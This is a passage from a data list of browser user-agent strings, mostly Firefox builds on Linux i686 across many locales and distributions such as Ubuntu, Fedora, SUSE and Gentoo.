(X11; U; Linux i686; fr; rv:1.8.1.19) Gecko/20081216 Ubuntu/7.10 (gutsy) Firefox/2.0.0.19\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.1) Gecko/20060601 Firefox/2.0.0.1 (Ubuntu-edgy)\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.2) Gecko/20060601 Firefox/2.0.0.2 (Ubuntu-edgy)\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.3) Gecko/20070310 Firefox/2.0.0.3 (Debian-2.0.0.3-2)\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.6) Gecko/20071008 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.8) Gecko/20071022 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.8) Gecko/20071022 Ubuntu/7.10 (gutsy) Firefox/2.0.0.8\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.8) Gecko/20071030 Fedora/2.0.0.8-2.fc8 Firefox/2.0.0.8\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1) Gecko/20060916 Firefox/2.0b2\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1) Gecko/20060918 Firefox/2.0b2\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.8) Gecko/20051111 Firefox/1.5\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.8) Gecko/20060110 Debian/1.5.dfsg-4 Firefox/1.5\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.10) Gecko/2009042513 Ubuntu/8.04 (hardy) Firefox/3.0.10\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.10) Gecko/2009042708 Fedora/3.0.10-1.fc10 Firefox/3.0.10\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.1) Gecko/2008070206 Firefox/2.0.0.8\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.0.2\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.2) Gecko/2008092318 Fedora/3.0.2-1.fc9 Firefox/3.0.2\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.03\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.7) Gecko/2009030422 Ubuntu/8.10 (intrepid) Firefox/3.0.7\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.7) Gecko/2009031218 Gentoo Firefox/3.0.7\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.04 (hardy) Firefox/3.0.9\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5\nMozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2\nMozilla/5.0 (X11; U; Linux i686 Gentoo; en-US; rv:1.8.1.13) Gecko/20080413 Firefox/2.0.0.13 (Gentoo Linux)\nMozilla/5.0 (X11; U; Linux i686; hu-HU; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)\nMozilla/5.0 (X11; U; Linux i686; hu-HU; rv:1.9.0.10) Gecko/2009042718 CentOS/3.0.10-1.el5.centos Firefox/3.0.10\nMozilla/5.0 (X11; U; Linux i686; hu-HU; rv:1.9.0.7) Gecko/2009030422 Ubuntu/8.10 (intrepid) Firefox/3.0.7 FirePHP/0.2.4\nMozilla/5.0 (X11; U; Linux i686; hu-HU; rv:1.9.1.9) Gecko/20100330 Fedora/3.5.9-1.fc12 Firefox/3.5.9\nMozilla/5.0 (X11; U; Linux i686; hu; rv:1.8.0.7) Gecko/20060911 SUSE/1.5.0.7-0.1 Firefox/1.5.0.7\nMozilla/5.0 (X11; U; Linux i686; hu; rv:1.8.1.1) Gecko/20061208 Firefox/2.0.0.1\nMozilla/5.0 (X11; U; Linux i686; hu; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2\nMozilla/5.0 (X11; U; Linux i686; hu; rv:1.8.1.8) Gecko/20071022 Ubuntu/7.10 (gutsy) Firefox/2.0.0.8\nMozilla/5.0 (X11; U; Linux i686; hu; rv:1.8b4) Gecko/20050827 Firefox/1.0+\nMozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)\nMozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.11) Gecko/2009060308 Linux Mint/7 (Gloria) Firefox/3.0.11\nMozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5\nMozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8\nMozilla/5.0 (X11; U; Linux i686; it; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1\nMozilla/5.0 (X11; U; Linux i686; it; rv:1.8.1.14) Gecko/20080416 Fedora/2.0.0.14-1.fc7 Firefox/2.0.0.14\nMozilla/5.0 (X11; U; Linux i686; it; rv:1.8.1.14) Gecko/20080420 Firefox/2.0.0.14\nMozilla/5.0 (X11; U; Linux i686; it; rv:1.8.1.3) Gecko/20070406 Firefox/2.0.0.3\nMozilla/5.0 (X11; U; Linux i686; it; rv:1.8.1.3) Gecko/20070410 Firefox/2.0.0.3\nMozilla/5.0 (X11; U; Linux i686; it; rv:1.8.1.4) Gecko/20060601 Firefox/2.0.0.4 (Ubuntu-edgy)\nMozilla/5.0 (X11; U; Linux i686; it; rv:1.8.1.4) Gecko/20070621 Firefox/2.0.0.4\nMozilla/5.0 (X11; U; Linux i686; it; rv:1.8) Gecko/20060113 Firefox/1.5\nMozilla/5.0 (X11; U; Linux i686; it; rv:1.9.0.11) Gecko/2009061118 Fedora/3.0.11-1.fc10 Firefox/3.0.11\nMozilla/5.0 (X11; U; Linux i686; it; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.0.2\nMozilla/5.0 (X11; U; Linux i686; it; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3\nMozilla/5.0 (X11; U; Linux i686; it; rv:1.9.0.4) Gecko/2008111217 Red Hat Firefox/3.0.4\nMozilla/5.0 (X11; U; Linux i686; it; rv:1.9.0.5) Gecko/2008121711 Ubuntu/9.04 (jaunty) Firefox/3.0.5\nMozilla/5.0 (X11; U; Linux i686; it; rv:1.9) Gecko/2008061015 Firefox/3.0\nMozilla/5.0 (X11; U; Linux i686; ja-JP; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11\nMozilla/5.0 (X11; U; Linux i686; ja-JP; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc12 Firefox/3.5.8\nMozilla/5.0 (X11; U; Linux i686; ja; rv:1.8.0.10) Gecko/20070510 Fedora/1.5.0.10-6.fc6 Firefox/1.5.0.10\nMozilla/5.0 (X11; U; Linux i686; ja; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11\nMozilla/5.0 (X11; U; Linux i686; ja; rv:1.8.1.11) Gecko/20071128 Firefox/2.0.0.11 (Debian-2.0.0.11-1)\nMozilla/5.0 (X11; U; Linux i686; ja; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3\nMozilla/5.0 (X11; U; Linux i686; ja; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)\nMozilla/5.0 (X11; U; Linux i686; ja; rv:1.9.0.5) Gecko/2008121622 Ubuntu/8.10 (intrepid) Firefox/3.0.5\nMozilla/5.0 (X11; U; Linux i686; ja; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)\nMozilla/5.0 (X11; U; Linux i686; ko-KR; rv:1.8.0.7) Gecko/20060913 Fedora/1.5.0.7-1.fc5 Firefox/1.5.0.7 pango-text\nMozilla/5.0 (X11; U; Linux i686; ko-KR; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3\nMozilla/5.0 (X11; U; Linux i686; ko-KR; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12\nMozilla/5.0 (X11; U; Linux i686; ko-KR; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3\nMozilla/5.0 (X11; U; Linux i686; lt-LT; rv:1.6) Gecko/20051114 Firefox/1.5\nMozilla/5.0 (X11; U; Linux i686; lt; rv:1.6) Gecko/20051114 Firefox/1.5\nMozilla/5.0 (X11; U; Linux i686; nb-NO; rv:1.8.1.3) Gecko/20070310 Firefox/2.0.0.3 (Debian-2.0.0.3-1)\nMozilla/5.0 (X11; U; Linux i686; nl-NL; rv:1.8.1.9) Gecko/20071105 Firefox/2.0.0.9\nMozilla/5.0 (X11; U; Linux i686; nl-NL; rv:1.9.0.19) Gecko/20090720 Firefox/3.5.1\nMozilla/5.0 (X11; U; Linux i686; nl-NL; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4\nMozilla/5.0 (X11; U; Linux i686; nl; rv:1.8.0.12) Gecko/20070601 Ubuntu/dapper-security Firefox/1.5.0.12\nMozilla/5.0 (X11; U; Linux i686; nl; rv:1.8.0.4) Gecko/20060608 Ubuntu/dapper-security Firefox/1.5.0.4\nMozilla/5.0 (X11; U; Linux i686; nl; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6\nMozilla/5.0 (X11; U; Linux i686; nl; rv:1.8.1.1) Gecko/20070311 Firefox/2.0.0.1\nMozilla/5.0 (X11; U; Linux i686; nl; rv:1.8.1.3) Gecko/20060601 Firefox/2.0.0.3 (Ubuntu-edgy)\nMozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\nMozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.0.11) Gecko/2009060309 Ubuntu/8.04 (hardy) Firefox/3.0.4\nMozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3\nMozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.0.4) Gecko/2008111317 Ubuntu/8.04 (hardy) Firefox/3.0.4\nMozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1\nMozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.1.9) Gecko/20100401 Ubuntu/9.10 (karmic) Firefox/3.5.9\nMozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.2.15) Gecko/20110303 Ubuntu/8.04 (hardy) Firefox/3.6.15\nMozilla/5.0 (X11; U; Linux i686; nl; rv:1.9) Gecko/2008061015 Firefox/3.0\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.7.10) Gecko/20050717 Firefox/1.0.6\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.7.10) Gecko/20050730 Firefox/1.0.6 (Debian package 1.0.6-2)\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.8.0.1) Gecko/20060313 Fedora/1.5.0.1-9 Firefox/1.5.0.1 pango-text Mnenhy/0.7.3.0\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.8.0.4) Gecko/20060608 Ubuntu/dapper-security Firefox/1.5.0.4\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.8.0.5) Gecko/20060731 Ubuntu/dapper-security Firefox/1.5.0.5 Mnenhy/0.7.4.666\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox) Mnenhy/0.7.4.666\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.8.1.10) Gecko/20071126 Ubuntu/7.10 (gutsy) Firefox/2.0.0.10\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.8.1.10) Gecko/20071128 Fedora/2.0.0.10-2.fc7 Firefox/2.0.0.10\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.8.1.10) Gecko/20071213 Fedora/2.0.0.10-3.fc8 Firefox/2.0.0.10\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.8.1.2) Gecko/20060601 Firefox/2.0.0.2 (Ubuntu-edgy)\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.8.1.3) Gecko/20061201 Firefox/2.0.0.3 (Ubuntu-feisty)\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.8.1.8) Gecko/20071022 Ubuntu/7.10 (gutsy) Firefox/2.0.0.8\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.8.1) Gecko/20061010 Firefox/2.0\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.10) Gecko/2009042513 Ubuntu/8.04 (hardy) Firefox/3.0.10\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.1) Gecko/2008071222 Firefox/3.0.1\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.1) Gecko/2008071719 Firefox/3.0.1\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.3) Gecko/2008092700 SUSE/3.0.3-2.2 Firefox/3.0.3\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.4) Gecko/20081031100 SUSE/3.0.4-4.6 Firefox/3.0.4\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.5) Gecko/2008121300 SUSE/3.0.5-0.1 Firefox/3.0.5\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.5) Gecko/2008121622 Slackware/2.6.27-PiP Firefox/3.0\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.7) Gecko/2009030422 Kubuntu/8.10 (intrepid) Firefox/3.0.9\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.7) Gecko/2009030503 Fedora/3.0.7-1.fc10 Firefox/3.0.7\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.10 (intrepid) Firefox/3.0.9\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9b4) Gecko/2008030800 SUSE/2.9.94-4.2 Firefox/3.0b4\nMozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5\nMozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12\nMozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1\nMozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1 Ubuntu\nMozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.1) Gecko/20060201 Firefox/1.5.0.1 (Swiftfox) Mnenhy/0.7.3.0\nMozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.1) Gecko/20060313 Fedora/1.5.0.1-9 Firefox/1.5.0.1 pango-text Mnenhy/0.7.3.0\nMozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.4) Gecko/20060527 SUSE/1.5.0.4-1.7 Firefox/1.5.0.4 Mnenhy/0.7.4.0\nMozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.4) Gecko/20060614 Fedora/1.5.0.4-1.2.fc5 Firefox/1.5.0.4 pango-text Mnenhy/0.7.4.0\nMozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.7) Gecko/20060914 Firefox/1.5.0.7 (Swiftfox)\nMozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1 (Ubuntu-edgy)\nMozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2\nMozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6\nMozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1\nMozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1) Gecko/20061003 Firefox/2.0 Ubuntu\nMozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1) Gecko/20061010 Firefox/2.0\nMozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1) Gecko/20061010 Firefox/2.0 Ubuntu\nMozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)\nMozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1) Gecko/20061127 Firefox/2.0\nMozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1) Gecko/20061127 Firefox/2.0 (Gentoo Linux)\nMozilla/5.0 (X11; U; Linux i686; pl; rv:1.8) Gecko/20051111 Firefox/1.5\nMozilla/5.0 (X11; U; Linux i686; pl; rv:1.8) Gecko/20051111 Firefox/1.5 Ubuntu\nMozilla/5.0 (X11; U; Linux i686; pl; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6\nMozilla/5.0 (X11; U; Linux i686; pl; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 (.NET CLR 3.5.30729; .NET4.0E)\nMozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6\nMozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)\nMozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.8.0.3) Gecko/20060523 Ubuntu/dapper Firefox/1.5.0.3\nMozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.8.0.4) Gecko/20060608 Ubuntu/dapper-security Firefox/1.5.0.4\nMozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6\nMozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.8.1.1) Gecko/20061208 Firefox/2.0.0.1\nMozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.8) Gecko/20051111 Firefox/1.5\nMozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.0.2\nMozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3\nMozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4\nMozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.4) Gecko/2008111317 Ubuntu/8.04 (hardy) Firefox/3.0.4\nMozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.2.13) Gecko/20101209 Fedora/3.6.13-1.fc13 Firefox/3.6.13\nMozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11\nMozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.0.5) Gecko/2008121622 Ubuntu/8.10 (intrepid) Firefox/3.0.4\nMozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.7.6) Gecko/20050318 Firefox/1.0.2\nMozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.8.1.11) Gecko/20071201 Firefox/2.0.0.11\nMozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.9.1.2) Gecko/20090804 Firefox/3.5.2\nMozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.9.2a1pre) Gecko/20090405 Ubuntu/9.04 (jaunty) Firefox/3.6a1pre\nMozilla/5.0 (X11; U; Linux i686; ru; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4\nMozilla/5.0 (X11; U; Linux i686; ru; rv:1.8.0.7) Gecko/20060921 Ubuntu/dapper-security Firefox/1.5.0.7\nMozilla/5.0 (X11; U; Linux i686; ru; rv:1.8.1.8) Gecko/20071022 Ubuntu/7.10 (gutsy) Firefox/2.0.0.8\nMozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1\nMozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.1) Gecko/2008071719 Firefox/3.0.1\nMozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.5) Gecko/2008120121 Firefox/3.0.5\nMozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.5) Gecko/2008121622 Ubuntu/8.10 (intrepid) Firefox/3.0.5\nMozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.1.3) Gecko/20091020 Ubuntu/10.04 (lucid) Firefox/4.0.1\nMozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.1.3) Gecko/20091020 Ubuntu/9.10 (karmic) Firefox/3.5.3\nMozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13\nMozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8\nMozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.3a5pre) Gecko/20100526 Firefox/3.7a5pre\nMozilla/5.0 (X11; U; Linux i686; ru; rv:1.9b5) Gecko/2008032600 SUSE/2.9.95-25.1 Firefox/3.0b5\nMozilla/5.0 (X11; U; Linux i686; ru; rv:1.9) Gecko/2008061812 Firefox/3.0\nMozilla/5.0 (X11; U; Linux i686; rv:1.7.3) Gecko/20040913 Firefox/0.10\nMozilla/5.0 (X11; U; Linux i686; rv:1.7.3) Gecko/20040914 Firefox/0.10\nMozilla/5.0 (X11; U; Linux i686; rv:1.7.3) Gecko/20040914 Firefox/0.10.1\nMozilla/5.0 (X11; U; Linux i686; rv:1.7.3) Gecko/20041001 Firefox/0.10.1\nMozilla/5.0 (X11; U; Linux i686; rv:1.7.3) Gecko/20041020 Firefox/0.10.1\nMozilla/5.0 (X11; U; Linux i686; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1\nMozilla/5.0 (X11; U; Linux i686; rv:1.9) Gecko/2008080808 Firefox/3.0\nMozilla/5.0 (X11; U; Linux i686; rv:1.9) Gecko/20080810020329 Firefox/3.0.1\nMozilla/5.0 (X11; U; Linux i686; sk; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7\nMozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.5) Gecko/2008121621 Ubuntu/8.04 (hardy) Firefox/3.0.5\nMozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.1) Gecko/20090630 Fedora/3.5-1.fc11 Firefox/3.0\nMozilla/5.0 (X11; U; Linux i686; sk; rv:1.9) Gecko/2008061015 Firefox/3.0\nMozilla/5.0 (X11; U; Linux i686; sv-SE; rv:1.8.0.13pre) Gecko/20071126 Ubuntu/dapper-security Firefox/1.5.0.13pre\nMozilla/5.0 (X11; U; Linux i686; sv-SE; rv:1.8.0.5) Gecko/20060731 Ubuntu/dapper-security Firefox/1.5.0.5\nMozilla/5.0 (X11; U; Linux i686; sv-SE; rv:1.8.0.8) Gecko/20061108 Fedora/1.5.0.8-1.fc5 Firefox/1.5.0.8\nMozilla/5.0 (X11; U; Linux i686; sv-SE; rv:1.8.1.2) Gecko/20061023 SUSE/2.0.0.2-1.1 Firefox/2.0.0.2\nMozilla/5.0 (X11; U; Linux i686; sv-SE; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3\nMozilla/5.0 (X11; U; Linux i686; sv-SE; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6\nMozilla/5.0 (X11; U; Linux i686; tr-TR; rv:1.8.1) Gecko/20061023 SUSE/2.0-30 Firefox/2.0\nMozilla/5.0 (X11; U; Linux i686; tr-TR; rv:1.9.0.10) Gecko/2009042523 Ubuntu/9.04 (jaunty) Firefox/3.0.10\nMozilla/5.0 (X11; U; Linux i686; tr-TR; rv:1.9.0) Gecko/2008061600 SUSE/3.0-1.2 Firefox/3.0\nMozilla/5.0 (X11; U; Linux i686; tr-TR; rv:1.9b5) Gecko/2008032600 SUSE/2.9.95-25.1 Firefox/3.0b5\nMozilla/5.0 (X11; U; Linux i686; Ubuntu 7.04; de-CH; rv:1.8.1.5) Gecko/20070309 Firefox/2.0.0.5\nMozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6\nMozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.8.0.6) Gecko/20060728 SUSE/1.5.0.6-1.3 Firefox/1.5.0.6\nMozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1) Gecko/20090624 Firefox/3.5\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-GB; rv:1.8.1.5) Gecko/20070718 Fedora/2.0.0.5-1.fc7 Firefox/2.0.0.5\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-GB; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-GB; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.10) Gecko/20060911 SUSE/1.5.0.10-0.2 Firefox/1.5.0.10\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.12) Gecko/20080326 CentOS/1.5.0.12-14.el5.centos Firefox/1.5.0.12\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.5) Gecko/20060726 Red Hat/1.5.0.5-0.el4.1 Firefox/1.5.0.5 pango-text\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.6) Gecko/20060728 SUSE/1.5.0.6-1.2 Firefox/1.5.0.6\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.9) Gecko/20061219 Fedora/1.5.0.9-1.fc6 Firefox/1.5.0.9 pango-text\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.10) Gecko/20071015 SUSE/2.0.0.10-0.1 Firefox/2.0.0.10\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.10) Gecko/20071015 SUSE/2.0.0.10-0.2 Firefox/2.0.0.10\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.10) Gecko/20071115 Firefox/2.0.0.10\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.14) Gecko/20080417 Firefox/2.0.0.14\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.16) Gecko/20080716 Firefox/2.0.0.16\nMozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.17) Gecko/20080829 